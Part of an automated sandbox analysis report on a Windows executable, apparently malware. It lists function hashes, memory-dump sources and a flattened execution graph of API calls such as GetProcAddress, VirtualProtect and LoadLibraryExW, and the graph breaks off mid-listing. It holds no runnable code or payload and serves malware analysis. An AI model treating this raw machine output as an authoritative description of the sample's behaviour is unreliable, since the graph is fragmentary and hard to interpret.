                                                                                                                                                                                                                    • Opcode ID: baa88afcbcf2073345d0122820c0a82c608bd188914e60473b6189336e795d9c
                                                                                                                                                                                                                    • Instruction ID: f566e6bdc25b8da72a27cd759ab33872d0fb45d6f13948db252cb2302d714893
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baa88afcbcf2073345d0122820c0a82c608bd188914e60473b6189336e795d9c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5231C6B240421ADFDB008F7CC94A97577E8FB0AB25710455AE840D7651E734F8D0CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                    • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                    • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:4.5%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                                    Signature Coverage:1.6%
                                                                                                                                                                                                                    Total number of Nodes:1662
                                                                                                                                                                                                                    Total number of Limit Nodes:33
                                                                                                                                                                                                                    execution_graph 7176 352d60ac 7177 352d60b7 7176->7177 7179 352d60dd 7176->7179 7178 352d60c7 FreeLibrary 7177->7178 7177->7179 7178->7177 6659 352d506f 6660 352d5081 6659->6660 6662 352d5087 6659->6662 6661 352d5000 20 API calls 6660->6661 6661->6662 6472 352d742b 6475 352d7430 6472->6475 6474 352d7453 6475->6474 6476 352d8bae 6475->6476 6477 352d8bbb 6476->6477 6478 352d8bdd 6476->6478 6479 352d8bc9 RtlDeleteCriticalSection 6477->6479 6480 352d8bd7 6477->6480 6478->6475 6479->6479 6479->6480 6481 352d571e 20 API calls 6480->6481 6481->6478 6663 352dac6b 6664 352dac84 6663->6664 6666 352dacad 6664->6666 6667 352db2f0 6664->6667 6668 352db329 6667->6668 6670 352db350 6668->6670 6678 352db5c1 6668->6678 6671 352db393 6670->6671 6672 352db36e 6670->6672 6691 352db8b2 6671->6691 6682 352db8e1 6672->6682 6675 352db38e 6676 352d2ada 5 API calls 6675->6676 6677 352db3b7 6676->6677 6677->6666 6679 352db5ec 6678->6679 6680 352db7e5 RaiseException 6679->6680 6681 352db7fd 6680->6681 6681->6670 6683 352db8f0 6682->6683 6684 352db90f 6683->6684 6685 352db964 6683->6685 6698 352d78a3 6684->6698 6687 352db8b2 20 API calls 6685->6687 6689 352db95d 6687->6689 6689->6675 6690 352db8b2 20 API calls 6690->6689 6692 352db8bf 6691->6692 6693 352db8d4 6691->6693 6694 352db8d9 6692->6694 6696 352d6368 20 API calls 6692->6696 6695 352d6368 20 API calls 6693->6695 6694->6675 6695->6694 6697 352db8cc 6696->6697 6697->6675 6699 352d78cb 6698->6699 6700 352d2ada 5 API calls 6699->6700 6701 352d78e8 6700->6701 6701->6689 6701->6690 6440 352dc7a7 6441 352dc7be 6440->6441 6445 352dc82c 6440->6445 6441->6445 6452 352dc7e6 GetModuleHandleA 6441->6452 6442 352dc835 GetModuleHandleA 6446 352dc83f 6442->6446 6443 352dc872 6445->6442 6445->6443 6445->6446 6446->6445 6447 352dc85f GetProcAddress 6446->6447 6447->6445 6448 352dc7dd 6448->6445 6448->6446 6449 352dc800 GetProcAddress 6448->6449 6449->6445 6450 352dc80d VirtualProtect 6449->6450 6450->6445 6451 352dc81c VirtualProtect 6450->6451 6451->6445 6453 352dc7ef 6452->6453 6458 352dc82c 6452->6458 6464 352dc803 GetProcAddress 6453->6464 6455 352dc835 GetModuleHandleA 6461 352dc83f 6455->6461 6456 352dc872 6457 352dc7f4 6457->6458 6459 352dc800 GetProcAddress 6457->6459 6458->6455 6458->6456 6458->6461 6459->6458 6460 352dc80d VirtualProtect 6459->6460 6460->6458 6462 352dc81c VirtualProtect 6460->6462 6461->6458 6463 352dc85f GetProcAddress 6461->6463 6462->6458 6463->6458 6465 352dc82c 6464->6465 6466 352dc80d VirtualProtect 6464->6466 6468 352dc835 GetModuleHandleA 6465->6468 6469 352dc872 6465->6469 6466->6465 6467 352dc81c VirtualProtect 6466->6467 6467->6465 6470 352dc83f 6468->6470 6470->6465 6470->6470 6471 352dc85f GetProcAddress 6470->6471 6471->6470 7180 352d21a1 7183 352d2418 7180->7183 7184 352d2420 7183->7184 7187 352d47f5 7184->7187 7186 352d21bc 7188 352d4808 7187->7188 7189 352d4804 7187->7189 7192 352d4815 7188->7192 7189->7186 7193 352d5b7a 20 API calls 7192->7193 7196 352d482c 7193->7196 7194 352d2ada 5 API calls 7195 352d4811 7194->7195 7195->7186 7196->7194 7197 352d81a0 7198 352d81d9 7197->7198 7199 352d81dd 7198->7199 7210 352d8205 7198->7210 7200 352d6368 20 API calls 7199->7200 7202 352d81e2 7200->7202 7201 352d8529 7203 352d2ada 5 API calls 7201->7203 7204 352d62ac 26 API calls 7202->7204 7205 352d8536 7203->7205 7206 352d81ed 7204->7206 7207 352d2ada 5 API calls 7206->7207 7209 352d81f9 7207->7209 7210->7201 7211 352d80c0 7210->7211 7214 352d80db 7211->7214 7212 352d2ada 5 API calls 7213 352d8152 7212->7213 7213->7210 7214->7212 7464 352da1e0 7467 352da1fe 7464->7467 7466 352da1f6 7468 352da203 7467->7468 7469 352daa53 21 API calls 7468->7469 7471 352da298 7468->7471 7470 352da42f 7469->7470 7470->7466 7471->7466 6482 352d543d 6483 352d5440 6482->6483 6486 352d55a8 6483->6486 6497 352d7613 6486->6497 6489 352d55b8 6491 352d55e0 6489->6491 6492 352d55c2 IsProcessorFeaturePresent 6489->6492 6533 352d4bc1 6491->6533 6493 352d55cd 6492->6493 6527 352d60e2 6493->6527 6536 352d7581 6497->6536 6500 352d766e 6501 352d767a 6500->6501 6502 352d5b7a 20 API calls 6501->6502 6506 352d76a7 6501->6506 6508 352d76a1 6501->6508 6502->6508 6503 352d76f3 6504 352d6368 20 API calls 6503->6504 6505 352d76f8 6504->6505 6550 352d62ac 6505->6550 6510 352d771f 6506->6510 6553 352d5671 RtlEnterCriticalSection 6506->6553 6507 352dbdc9 5 API calls 6511 352d7875 6507->6511 6508->6503 6508->6506 6512 352d76d6 6508->6512 6514 352d777e 6510->6514 6516 352d7776 6510->6516 6524 352d77a9 6510->6524 6554 352d56b9 RtlLeaveCriticalSection 6510->6554 6511->6489 6512->6507 6514->6524 6555 352d7665 6514->6555 6519 352d4bc1 28 API calls 6516->6519 6519->6514 6523 352d7665 38 API calls 6523->6524 6558 352d782e 6524->6558 6525 352d780c 6525->6512 6526 352d5af6 38 API calls 6525->6526 6526->6512 6528 352d60fe 6527->6528 6529 352d612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6528->6529 6530 352d61fb 6529->6530 6531 352d2ada 5 API calls 6530->6531 6532 352d6219 6531->6532 6532->6491 6534 352d499b 28 API calls 6533->6534 6535 352d4bd2 6534->6535 6539 352d7527 6536->6539 6538 352d55ad 6538->6489 6538->6500 6540 352d7533 6539->6540 6545 352d5671 RtlEnterCriticalSection 6540->6545 6542 352d7541 6546 352d7575 6542->6546 6544 352d7568 6544->6538 6545->6542 6549 352d56b9 RtlLeaveCriticalSection 6546->6549 6548 352d757f 6548->6544 6549->6548 6582 352d6231 6550->6582 6552 352d62b8 6552->6512 6553->6510 6554->6516 6556 352d5af6 38 API calls 6555->6556 6557 352d766a 6556->6557 6557->6523 6559 352d77fd 6558->6559 6560 352d7834 6558->6560 6559->6512 6559->6525 6562 352d5af6 GetLastError 6559->6562 6597 352d56b9 RtlLeaveCriticalSection 6560->6597 6563 352d5b0c 6562->6563 6564 352d5b12 6562->6564 6565 352d5e08 11 API calls 6563->6565 6566 352d637b 20 API calls 6564->6566 6568 352d5b61 SetLastError 6564->6568 6565->6564 6567 352d5b24 6566->6567 6569 352d5b2c 6567->6569 6570 352d5e5e 11 API calls 6567->6570 6568->6525 6572 352d571e 20 API calls 6569->6572 6571 352d5b41 6570->6571 6571->6569 6574 352d5b48 6571->6574 6573 352d5b32 6572->6573 6575 352d5b6d SetLastError 6573->6575 6576 352d593c 20 API calls 6574->6576 6578 352d55a8 35 API calls 6575->6578 6577 352d5b53 6576->6577 6579 352d571e 20 API calls 6577->6579 6580 352d5b79 6578->6580 6581 352d5b5a 6579->6581 6581->6568 6581->6575 6583 352d5b7a 20 API calls 6582->6583 6584 352d6247 6583->6584 6585 352d62a6 6584->6585 6588 352d6255 6584->6588 6593 352d62bc IsProcessorFeaturePresent 6585->6593 6587 352d62ab 6589 352d6231 26 API calls 6587->6589 6590 352d2ada 5 API calls 6588->6590 6591 352d62b8 6589->6591 6592 352d627c 6590->6592 6591->6552 6592->6552 6594 352d62c7 6593->6594 6595 352d60e2 8 API calls 6594->6595 6596 352d62dc GetCurrentProcess TerminateProcess 6595->6596 6596->6587 6597->6559 7215 352d67bf 7220 352d67f4 7215->7220 7218 352d571e 20 API calls 7219 352d67db 7218->7219 7221 352d6806 7220->7221 7230 352d67cd 7220->7230 7222 352d680b 7221->7222 7223 352d6836 7221->7223 7224 352d637b 20 API calls 7222->7224 7223->7230 7231 352d71d6 7223->7231 7225 352d6814 7224->7225 7228 352d571e 20 API calls 7225->7228 7227 352d6851 7229 352d571e 20 API calls 7227->7229 7228->7230 7229->7230 7230->7218 7230->7219 7232 352d71e1 7231->7232 7233 352d7209 7232->7233 7234 352d71fa 7232->7234 7235 352d7218 7233->7235 7240 352d8a98 7233->7240 7236 352d6368 20 API calls 7234->7236 7247 352d8acb 7235->7247 7239 352d71ff 7236->7239 7239->7227 7241 352d8ab8 RtlSizeHeap 7240->7241 7242 352d8aa3 7240->7242 7241->7235 7243 352d6368 20 API calls 7242->7243 7244 352d8aa8 7243->7244 7245 352d62ac 26 API calls 7244->7245 7246 352d8ab3 7245->7246 7246->7235 7248 352d8ad8 7247->7248 7249 352d8ae3 7247->7249 7259 352d56d0 7248->7259 7251 352d8aeb 7249->7251 7257 352d8af4 7249->7257 7252 352d571e 20 API calls 7251->7252 7255 352d8ae0 7252->7255 7253 352d8b1e RtlReAllocateHeap 7253->7255 7253->7257 7254 352d8af9 7256 352d6368 20 API calls 7254->7256 7255->7239 7256->7255 7257->7253 7257->7254 7258 352d474f 7 API calls 7257->7258 7258->7257 7260 352d570e 7259->7260 7264 352d56de 7259->7264 7261 352d6368 20 API calls 7260->7261 7263 352d570c 7261->7263 7262 352d56f9 RtlAllocateHeap 7262->7263 7262->7264 7263->7255 7264->7260 7264->7262 7265 352d474f 7 API calls 7264->7265 7265->7264 7472 352d5bff 7480 352d5d5c 7472->7480 7475 352d5b7a 20 API calls 7476 352d5c1b 7475->7476 7477 352d5c28 7476->7477 7478 352d5c2b 11 API calls 7476->7478 7479 352d5c13 7478->7479 7481 352d5c45 5 API calls 7480->7481 7482 352d5d83 7481->7482 7483 352d5d9b TlsAlloc 7482->7483 7486 352d5d8c 7482->7486 7483->7486 7484 352d2ada 5 API calls 7485 352d5c09 7484->7485 7485->7475 7485->7479 7486->7484 7266 352d9db8 7267 352d9dbf 7266->7267 7268 352d9e20 7267->7268 7269 352d9ddf 7267->7269 7270 352daa17 21 API calls 7268->7270 7271 352da90e 7268->7271 7269->7271 7273 352daa17 21 API calls 7269->7273 7272 352d9e6e 7270->7272 7274 352da93e 7273->7274 6702 352d9e71 6703 352d9e95 6702->6703 6704 352d9ee6 6703->6704 6706 352d9f71 6703->6706 6707 352d9ef8 6704->6707 6710 352daa53 6704->6710 6708 352db2f0 21 API calls 6706->6708 6709 352dacad 6706->6709 6708->6709 6711 352daa70 RtlDecodePointer 6710->6711 6713 352daa80 6710->6713 6711->6713 6712 352d2ada 5 API calls 6715 352dac67 6712->6715 6714 352dab0d 6713->6714 6716 352dab02 6713->6716 6718 352daab7 6713->6718 6714->6716 6717 352d6368 20 API calls 6714->6717 6715->6707 6716->6712 6717->6716 6718->6716 6719 352d6368 20 API calls 6718->6719 6719->6716 6598 352d5630 6599 352d563b 6598->6599 6601 352d5664 6599->6601 6602 352d5660 6599->6602 6604 352d5eb7 6599->6604 6611 352d5688 6601->6611 6605 352d5c45 5 API calls 6604->6605 6606 352d5ede 6605->6606 6607 352d5efc InitializeCriticalSectionAndSpinCount 6606->6607 6608 352d5ee7 6606->6608 6607->6608 6609 352d2ada 5 API calls 6608->6609 6610 352d5f13 6609->6610 6610->6599 6612 352d56b4 6611->6612 6613 352d5695 6611->6613 6612->6602 6614 352d569f RtlDeleteCriticalSection 6613->6614 6614->6612 6614->6614 6720 352d3370 6731 352d3330 6720->6731 6732 352d334f 6731->6732 6733 352d3342 6731->6733 6734 352d2ada 5 API calls 6733->6734 6734->6732 7487 352d63f0 7488 352d6400 7487->7488 7491 352d6416 7487->7491 7489 352d6368 20 API calls 7488->7489 7490 352d6405 7489->7490 7493 352d62ac 26 API calls 7490->7493 7494 352d6480 7491->7494 7498 352d6561 7491->7498 7506 352d6580 7491->7506 7501 352d640f 7493->7501 7517 352d4e76 7494->7517 7496 352d64ee 7497 352d571e 20 API calls 7496->7497 7497->7498 7532 352d679a 7498->7532 7500 352d64e5 7500->7496 7503 352d6573 7500->7503 7523 352d85eb 7500->7523 7504 352d62bc 11 API calls 7503->7504 7505 352d657f 7504->7505 7507 352d658c 7506->7507 7507->7507 7508 352d637b 20 API calls 7507->7508 7509 352d65ba 7508->7509 7510 352d85eb 26 API calls 7509->7510 7511 352d65e6 7510->7511 7512 352d62bc 11 API calls 7511->7512 7513 352d6615 7512->7513 7514 352d66b6 FindFirstFileExA 7513->7514 7515 352d6705 7514->7515 7516 352d6580 26 API calls 7515->7516 7518 352d4e8b 7517->7518 7519 352d4e87 7517->7519 7518->7519 7520 352d637b 20 API calls 7518->7520 7519->7500 7521 352d4eb9 7520->7521 7522 352d571e 20 API calls 7521->7522 7522->7519 7526 352d853a 7523->7526 7524 352d854f 7525 352d8554 7524->7525 7527 352d6368 20 API calls 7524->7527 7525->7500 7526->7524 7526->7525 7530 352d858b 7526->7530 7528 352d857a 7527->7528 7529 352d62ac 26 API calls 7528->7529 7529->7525 7530->7525 7531 352d6368 20 API calls 7530->7531 7531->7528 7533 352d67a4 7532->7533 7534 352d67b4 7533->7534 7536 352d571e 20 API calls 7533->7536 7535 352d571e 20 API calls 7534->7535 7537 352d67bb 7535->7537 7536->7533 7537->7501 7279 352d3eb3 7282 352d5411 7279->7282 7283 352d541d 7282->7283 7284 352d5af6 38 API calls 7283->7284 7285 352d5422 7284->7285 7286 352d55a8 38 API calls 7285->7286 7287 352d544c 7286->7287 5775 352d220c 5776 352d221a 5775->5776 5777 352d2215 5775->5777 5781 352d20db 5776->5781 5789 352d22b1 5777->5789 5780 352d2228 5782 352d20e7 5781->5782 5784 352d210b 5782->5784 5788 352d20f6 5782->5788 5793 352d1eec 5782->5793 5786 352d1eec 50 API calls 5784->5786 5787 352d216d 5784->5787 5784->5788 5785 352d1eec 50 API calls 5785->5788 5786->5787 5787->5785 5787->5788 5788->5780 5790 352d22c7 5789->5790 5792 352d22d0 5790->5792 6283 352d2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5790->6283 5792->5776 5794 352d1f2a 5793->5794 5795 352d1ef7 5793->5795 5836 352d2049 5794->5836 5797 352d1f1c 5795->5797 5798 352d1efc 5795->5798 5818 352d1f3f 5797->5818 5799 352d1f01 5798->5799 5800 352d1f12 5798->5800 5802 352d1f06 5799->5802 5805 352d240b 5799->5805 5810 352d23ec 5800->5810 5802->5784 5850 352d53e5 5805->5850 6034 352d3513 5810->6034 5813 352d23f5 5813->5802 5816 352d2408 5816->5802 5817 352d351e 7 API calls 5817->5813 5819 352d1f4b 5818->5819 6052 352d247c 5819->6052 5821 352d1f52 5822 352d1f7c 5821->5822 5823 352d2041 5821->5823 5835 352d1f57 5821->5835 6063 352d23de 5822->6063 6079 352d2639 IsProcessorFeaturePresent 5823->6079 5826 352d2048 5827 352d1f8b 5827->5835 6066 352d22fc RtlInitializeSListHead 5827->6066 5829 352d1f99 6067 352d46c5 5829->6067 5833 352d1fb8 5833->5835 6075 352d4669 5833->6075 5835->5802 5838 352d2055 5836->5838 5837 352d205e 5837->5802 5838->5837 5839 352d207d 5838->5839 5840 352d20d3 5838->5840 6156 352d244c 5839->6156 5841 352d2639 4 API calls 5840->5841 5843 352d20da 5841->5843 5844 352d2082 6165 352d2308 5844->6165 5846 352d2087 6168 352d20c4 5846->6168 5848 352d209f 6171 352d260b 5848->6171 5856 352d5aca 5850->5856 5853 352d351e 6005 352d3820 5853->6005 5855 352d2415 5855->5802 5857 352d2410 5856->5857 5858 352d5ad4 5856->5858 5857->5853 5864 352d5e08 5858->5864 5884 352d5c45 5864->5884 5866 352d5e2f 5867 352d5e47 TlsGetValue 5866->5867 5868 352d5e3b 5866->5868 5867->5868 5890 352d2ada 5868->5890 5870 352d5adb 5870->5857 5871 352d5e5e 5870->5871 5872 352d5c45 5 API calls 5871->5872 5873 352d5e85 5872->5873 5874 352d5ea0 TlsSetValue 5873->5874 5875 352d5e94 5873->5875 5874->5875 5876 352d2ada 5 API calls 5875->5876 5877 352d5aee 5876->5877 5878 352d59b5 5877->5878 5879 352d59c0 5878->5879 5883 352d59d0 5878->5883 5905 352d59d6 5879->5905 5883->5857 5885 352d5c71 5884->5885 5889 352d5c75 5884->5889 5888 352d5c95 5885->5888 5885->5889 5897 352d5ce1 5885->5897 5887 352d5ca1 GetProcAddress 5887->5889 5888->5887 5888->5889 5889->5866 5891 352d2ae5 IsProcessorFeaturePresent 5890->5891 5892 352d2ae3 5890->5892 5894 352d2b58 5891->5894 5892->5870 5904 352d2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5894->5904 5896 352d2c3b 5896->5870 5898 352d5cf7 5897->5898 5899 352d5d02 LoadLibraryExW 5897->5899 5898->5885 5900 352d5d1f GetLastError 5899->5900 5903 352d5d37 5899->5903 5901 352d5d2a LoadLibraryExW 5900->5901 5900->5903 5901->5903 5902 352d5d4e FreeLibrary 5902->5898 5903->5898 5903->5902 5904->5896 5906 352d59e9 5905->5906 5907 352d59ef 5905->5907 5908 352d571e 20 API calls 5906->5908 5909 352d571e 20 API calls 5907->5909 5908->5907 5910 352d59fb 5909->5910 5911 352d571e 20 API calls 5910->5911 5912 352d5a06 5911->5912 5913 352d571e 20 API calls 5912->5913 5914 352d5a11 5913->5914 5915 352d571e 20 API calls 5914->5915 5916 352d5a1c 5915->5916 5917 352d571e 20 API calls 5916->5917 5918 352d5a27 5917->5918 5919 352d571e 20 API calls 5918->5919 5920 352d5a32 5919->5920 5921 352d571e 20 API calls 5920->5921 5922 352d5a3d 5921->5922 5923 352d571e 20 API calls 5922->5923 5924 352d5a48 5923->5924 5925 352d571e 20 API calls 5924->5925 5926 352d5a56 5925->5926 5937 352d589c 5926->5937 5931 352d571e 5932 352d5729 RtlFreeHeap 5931->5932 5933 352d5752 5931->5933 5932->5933 5934 352d573e 5932->5934 5933->5883 5971 352d6368 5934->5971 5943 352d57a8 5937->5943 5939 352d58c0 5940 352d58ec 5939->5940 5955 352d5809 5940->5955 5942 352d5910 5942->5931 5944 352d57b4 5943->5944 5951 352d5671 RtlEnterCriticalSection 5944->5951 5946 352d57e8 5952 352d57fd 5946->5952 5948 352d57be 5948->5946 5950 352d571e 20 API calls 5948->5950 5949 352d57f5 5949->5939 5950->5946 5951->5948 5953 352d56b9 RtlLeaveCriticalSection 5952->5953 5954 352d5807 5953->5954 5954->5949 5956 352d5815 5955->5956 5963 352d5671 RtlEnterCriticalSection 5956->5963 5958 352d581f 5964 352d5a7f 5958->5964 5960 352d5832 5968 352d5848 5960->5968 5962 352d5840 5962->5942 5963->5958 5965 352d5ab5 5964->5965 5966 352d5a8e 5964->5966 5965->5960 5966->5965 5967 352d7cc2 20 API calls 5966->5967 5967->5965 5969 352d56b9 RtlLeaveCriticalSection 5968->5969 5970 352d5852 5969->5970 5970->5962 5974 352d5b7a GetLastError 5971->5974 5975 352d5b99 5974->5975 5976 352d5b93 5974->5976 5980 352d5bf0 SetLastError 5975->5980 5993 352d637b 5975->5993 5977 352d5e08 11 API calls 5976->5977 5977->5975 5983 352d5744 GetLastError 5980->5983 5981 352d5bb3 5985 352d571e 17 API calls 5981->5985 5982 352d5e5e 11 API calls 5984 352d5bc8 5982->5984 5983->5933 5984->5981 5986 352d5bcf 5984->5986 5987 352d5bb9 5985->5987 6000 352d593c 5986->6000 5989 352d5be7 SetLastError 5987->5989 5989->5983 5991 352d571e 17 API calls 5992 352d5be0 5991->5992 5992->5980 5992->5989 5998 352d6388 5993->5998 5994 352d63c8 5996 352d6368 19 API calls 5994->5996 5995 352d63b3 RtlAllocateHeap 5997 352d5bab 5995->5997 5995->5998 5996->5997 5997->5981 5997->5982 5998->5994 5998->5995 5999 352d474f 7 API calls 5998->5999 5999->5998 6001 352d5914 RtlEnterCriticalSection RtlLeaveCriticalSection 6000->6001 6002 352d5997 6001->6002 6003 352d58c4 20 API calls 6002->6003 6004 352d59ae 6003->6004 6004->5991 6006 352d382d 6005->6006 6010 352d384b 6005->6010 6007 352d383b 6006->6007 6011 352d3b67 6006->6011 6016 352d3ba2 6007->6016 6010->5855 6021 352d3a82 6011->6021 6013 352d3b81 6014 352d3b99 TlsGetValue 6013->6014 6015 352d3b8d 6013->6015 6014->6015 6015->6007 6017 352d3a82 5 API calls 6016->6017 6018 352d3bbc 6017->6018 6019 352d3bd7 TlsSetValue 6018->6019 6020 352d3bcb 6018->6020 6019->6020 6020->6010 6022 352d3aaa 6021->6022 6026 352d3aa6 6021->6026 6022->6026 6027 352d39be 6022->6027 6025 352d3ac4 GetProcAddress 6025->6026 6026->6013 6032 352d39cd 6027->6032 6028 352d3a77 6028->6025 6028->6026 6029 352d39ea LoadLibraryExW 6030 352d3a05 GetLastError 6029->6030 6029->6032 6030->6032 6031 352d3a60 FreeLibrary 6031->6032 6032->6028 6032->6029 6032->6031 6033 352d3a38 LoadLibraryExW 6032->6033 6033->6032 6040 352d3856 6034->6040 6036 352d23f1 6036->5813 6037 352d53da 6036->6037 6038 352d5b7a 20 API calls 6037->6038 6039 352d23fd 6038->6039 6039->5816 6039->5817 6041 352d385f 6040->6041 6042 352d3862 GetLastError 6040->6042 6041->6036 6043 352d3b67 6 API calls 6042->6043 6044 352d3877 6043->6044 6045 352d3896 6044->6045 6046 352d38dc SetLastError 6044->6046 6047 352d3ba2 6 API calls 6044->6047 6045->6046 6046->6036 6048 352d3890 6047->6048 6048->6045 6049 352d38b8 6048->6049 6050 352d3ba2 6 API calls 6048->6050 6049->6045 6051 352d3ba2 6 API calls 6049->6051 6050->6049 6051->6045 6053 352d2485 6052->6053 6083 352d2933 IsProcessorFeaturePresent 6053->6083 6057 352d2496 6058 352d249a 6057->6058 6094 352d53c8 6057->6094 6058->5821 6061 352d24b1 6061->5821 6150 352d24b5 6063->6150 6065 352d23e5 6065->5827 6066->5829 6070 352d46dc 6067->6070 6068 352d2ada 5 API calls 6069 352d1fad 6068->6069 6069->5835 6071 352d23b3 6069->6071 6070->6068 6072 352d23b8 6071->6072 6073 352d2933 IsProcessorFeaturePresent 6072->6073 6074 352d23c1 6072->6074 6073->6074 6074->5833 6076 352d4698 6075->6076 6077 352d2ada 5 API calls 6076->6077 6078 352d46c1 6077->6078 6078->5835 6080 352d264e 6079->6080 6081 352d26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6080->6081 6082 352d2744 6081->6082 6082->5826 6084 352d2491 6083->6084 6085 352d34ea 6084->6085 6086 352d34ef 6085->6086 6105 352d3936 6086->6105 6090 352d3505 6091 352d3510 6090->6091 6119 352d3972 6090->6119 6091->6057 6093 352d34fd 6093->6057 6142 352d7457 6094->6142 6097 352d3529 6098 352d3532 6097->6098 6104 352d3543 6097->6104 6099 352d391b 6 API calls 6098->6099 6100 352d3537 6099->6100 6101 352d3972 RtlDeleteCriticalSection 6100->6101 6102 352d353c 6101->6102 6146 352d3c50 6102->6146 6104->6058 6107 352d393f 6105->6107 6108 352d3968 6107->6108 6109 352d34f9 6107->6109 6123 352d3be0 6107->6123 6110 352d3972 RtlDeleteCriticalSection 6108->6110 6109->6093 6111 352d38e8 6109->6111 6110->6109 6128 352d3af1 6111->6128 6114 352d38fd 6114->6090 6115 352d3ba2 6 API calls 6116 352d390b 6115->6116 6117 352d3918 6116->6117 6133 352d391b 6116->6133 6117->6090 6120 352d399c 6119->6120 6121 352d397d 6119->6121 6120->6093 6122 352d3987 RtlDeleteCriticalSection 6121->6122 6122->6120 6122->6122 6124 352d3a82 5 API calls 6123->6124 6125 352d3bfa 6124->6125 6126 352d3c18 InitializeCriticalSectionAndSpinCount 6125->6126 6127 352d3c03 6125->6127 6126->6127 6127->6107 6129 352d3a82 5 API calls 6128->6129 6130 352d3b0b 6129->6130 6131 352d3b24 TlsAlloc 6130->6131 6132 352d38f2 6130->6132 6132->6114 6132->6115 6134 352d3925 6133->6134 6135 352d392b 6133->6135 6137 352d3b2c 6134->6137 6135->6114 6138 352d3a82 5 API calls 6137->6138 6139 352d3b46 6138->6139 6140 352d3b5e TlsFree 6139->6140 6141 352d3b52 6139->6141 6140->6141 6141->6135 6145 352d7470 6142->6145 6143 352d2ada 5 API calls 6144 352d24a3 6143->6144 6144->6061 6144->6097 6145->6143 6147 352d3c7f 6146->6147 6149 352d3c59 6146->6149 6147->6104 6148 352d3c69 FreeLibrary 6148->6149 6149->6147 6149->6148 6151 352d24c8 6150->6151 6152 352d24c4 6150->6152 6153 352d2639 4 API calls 6151->6153 6155 352d24d5 6151->6155 6152->6065 6154 352d2559 6153->6154 6155->6065 6157 352d2451 6156->6157 6158 352d2455 6157->6158 6162 352d2461 6157->6162 6177 352d527a 6158->6177 6161 352d246e 6161->5844 6162->6161 6180 352d499b 6162->6180 6255 352d34c7 RtlInterlockedFlushSList 6165->6255 6167 352d2312 6167->5846 6257 352d246f 6168->6257 6170 352d20c9 6170->5848 6172 352d2617 6171->6172 6173 352d262d 6172->6173 6276 352d53ed 6172->6276 6173->5837 6176 352d3529 8 API calls 6176->6173 6202 352d5132 6177->6202 6181 352d49a7 6180->6181 6182 352d49bf 6181->6182 6224 352d4af5 GetModuleHandleW 6181->6224 6233 352d5671 RtlEnterCriticalSection 6182->6233 6186 352d4a65 6234 352d4aa5 6186->6234 6190 352d4a3c 6193 352d4a54 6190->6193 6197 352d4669 5 API calls 